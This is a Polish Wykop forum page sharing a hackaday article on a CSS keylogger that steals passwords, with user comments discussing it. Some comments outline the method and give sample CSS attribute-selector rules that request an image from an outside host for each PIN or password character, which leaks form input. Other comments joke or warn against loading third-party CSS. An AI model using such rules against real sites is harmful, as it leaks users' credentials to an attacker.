Wykop.pl Wykop.pl
  • Główna
  • Wykopalisko225
  • Hity
  • Mikroblog
  • Zaloguj się
  • Zarejestruj się
Zaloguj się

Popularne tagi

  • #ciekawostki
  • #informacje
  • #technologia
  • #polska
  • #swiat
  • #motoryzacja
  • #podroze
  • #heheszki
  • #sport

Wykop

  • Ranking
  • Osiągnięcia
  • FAQ
  • O nas
  • Kontakt
  • Reklama
  • Regulamin

265

Kradzież hasła przy pomocy CSS-a[eng]

Kradzież hasła przy pomocy CSS-a[eng]

Artykuł, zakończony filmikiem na temat opowiada jak w sprytny sposób można ukraść hasło z przeglądarki odpowiednim stylem w CSSie

wytrzzeszcz
wytrzzeszcz
z
hackaday.com
dodany: 25.02.2018, 22:54:52
  • #
    technologia
  • #
    webdev
  • #
    programowanie
  • #
    hacking
  • #
    ciekawostki
  • #
    internet
  • 34
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

Treści powiązane (3)

CSS Keylogger - old is new again
inquis1t0r
z youtube.com
  • 17
Livestream Gynvaela na ten sam temat po polsku
Kalwi
z youtube.com
  • 1

Komentarze (34)

najlepsze

maly_swd
maly_swd
maly_swd
26.02.2018, 11:47:02
  • 38
W skrócie: (metodę można rozwinąć)

1. Reguła css jest napisana do każdej możliwej kombinacji (używa się tego do PINów).
2. CSS ma możliwość ułożenia reguły do wartości z inputa
3. Jeśli się zgadza wartość z reguła to przeglądarka odpytuje serwer o plik, który nazywa się tak jak wartość z pola.
4. Pliki mają wyłączone cachowanie
  • 9
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

maly_swd
maly_swd
maly_swd
26.02.2018, 16:36:34
  • 12
@snx: Podałem w uproszczeniu i w 100% jak przechwycić.

input[type="pin"][value$="0000"] { background-color: url(http://notahackaday.com/0000.png }
input[type="pin"][value$="0001"] { background-color: url(http://notahackaday.com/0001.png }
...
input[type="pin"][value$="9999"]
  • Odpowiedz
maly_swd
maly_swd
maly_swd
27.02.2018, 13:28:04
  • 1
@SiergiejLapczydow: Np. reklamy mogą używać css ale już js nie. Reklamy możesz osadzać na dowolnych stronach przez agencje reklamowe.
  • Odpowiedz
hpiotrekh
hpiotrekh
26.02.2018, 20:28:59
  • 35
A nie można emacsem przez sendmaila omijając przy tym potrójną ścianę ogniową?
  • 3
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

Dobry_Ziemniak
Dobry_Ziemniak
26.02.2018, 21:27:50
  • 5
@hpiotrekh: Wpuszczają w fake :(
  • Odpowiedz
severson
severson
27.02.2018, 10:45:44
  • 0
A nie można emacsem przez sendmaila omijając przy tym potrójną ścianę ogniową?


@hpiotrekh: Nie wiem, ale włamanie emacsem przez sendmail jest technicznie możliwe chyba
  • Odpowiedz
eMBee
eMBee
eMBee
26.02.2018, 21:15:23
  • 16
I teraz zawód 'Programista CSS' nabiera nowego znaczenia... :D
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

shpyo
shpyo
shpyo
26.02.2018, 12:36:36
  • 3
Było się na szkoleniu od @sekurak to się umie w hacking :D. W sumie to nic nowego.
  • 1
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

securitymb
securitymb
securitymb
26.02.2018, 20:33:22
  • 0
@shpyo: I na samym Sekuraku też o tym było: https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/
  • Odpowiedz
Neoqueto
Neoqueto
27.02.2018, 13:09:18
  • 0
Powiem więcej. Może nawet niekoniecznie wczytywać obrazki. W CSS można podlinkować pełen plik PHP jako background-image, przynajmniej jeśli zwróci on obrazek przez readfile. Wtedy dużo łatwiej będzie śledzić takie wczytywania obrazków. https://codepen.io/neoqueto/pen/yvQxwR (tutaj jako przykład rotator obrazków do banera)
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

graczu
graczu
27.02.2018, 11:22:38
  • 0
Dlatego nie ładować plików CSS z obcych źródeł, tak amo plików JS, CDNów ( też mogą paść ofiarą ataków ).
A jak samemu się padnie ofiarą ataku to nikt nie będzie się raczej bawił by wyciągać hasła po CSS :-)
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

T.....X
T.....X
konto usunięte 26.02.2018, 20:53:23
  • 0
T.....X

źródło: comment_H5bOvF2czd0120oesQCQKtE8W17rovp5.jpg

Pobierz
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

mosqua
mosqua
27.02.2018, 11:02:54
  • -1
(✌ ゚ ∀ ゚)☞(✌ ゚ ∀ ゚)☞(✌ ゚ ∀ ゚)☞(✌ ゚ ∀ ゚)☞(✌ ゚ ∀ ゚)☞(✌ ゚ ∀ ゚)☞
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

M.....r
M.....r
konto usunięte 26.02.2018, 17:20:56
  • -3
Zaczyna się (-‸ლ)
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

wacky
wacky
26.02.2018, 08:11:14
  • -4
Ale to chyba tylko zadziała jak ktoś aktualizuje wpisane wartości w tym polu? Zazwyczaj nikt tego nie robi.
W takim przypadku to nie zadziała:

input[type="password"][value$="a"] {
background-image: url("http://localhost:8000/a");
}
  • 10
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

wacky
wacky
26.02.2018, 10:16:17
  • 0
@Thael32: No nie jest tak dokonca. Próbowałem jak mówisz i przeglądarka o nic nie pyta. Pyta dopiero jak wygenerujesz strone z odpowiednią wartością inputa czyli np value="a".

Próbowalem to robić na Firefox ESR 52.3.0 (64 bit)
  • Odpowiedz
paliwoda
paliwoda
26.02.2018, 13:45:27 via Android
  • 1
w tedy

@xaweryz (-‸ლ)
  • Odpowiedz
  • <
  • 1
  • 2
  • Strona 1 z 2
  • >

Hity

tygodnia

PILNE: Domagamy się delegalizacji posiadania i hodowli niebezpiecznych ras psów
PILNE: Domagamy się delegalizacji posiadania i hodowli niebezpiecznych ras psów
7374
Dziś minęły dwa lata odkąd Sebastian Majtczak zabił 3 osoby na autostradzie A1.
Dziś minęły dwa lata odkąd Sebastian Majtczak zabił 3 osoby na autostradzie A1.
4537
Chcesz dodać opinię o Media Expert? Ok, ale akceptujemy tylko pozytywne :)
Chcesz dodać opinię o Media Expert? Ok, ale akceptujemy tylko pozytywne :)
3183
Luxmed abonament = brak terminów. No chyba, że zapłacisz za wizytę, to od ręki
Luxmed abonament = brak terminów. No chyba, że zapłacisz za wizytę, to od ręki
3130
Sąd zdecydował. "Wtorki dla pań" w saunie to dyskryminacja mężczyzn
Sąd zdecydował. "Wtorki dla pań" w saunie to dyskryminacja mężczyzn
3015
Pokaż więcej

Powiązane tagi

  • #ciekawostki
  • #nauka
  • #komputery
  • #zainteresowania
  • #stacjakosmiczna
  • #polska
  • #informatyka
  • #wydarzenia
  • #swiat
  • #rozrywka
  • #internet
  • #sztucznainteligencja
  • #motoryzacja
  • #ai
  • #telefony

Wykop © 2005-2025

  • O nas
  • Reklama
  • FAQ
  • Kontakt
  • Regulamin
  • Polityka prywatności i cookies
  • Hity
  • Ranking
  • Osiągnięcia
  • Changelog
  • więcej

RSS

  • Wykopane
  • Wykopalisko
  • Komentowane
  • Ustawienia prywatności

Regulamin

Reklama

Kontakt

O nas

FAQ

Osiągnięcia

Ranking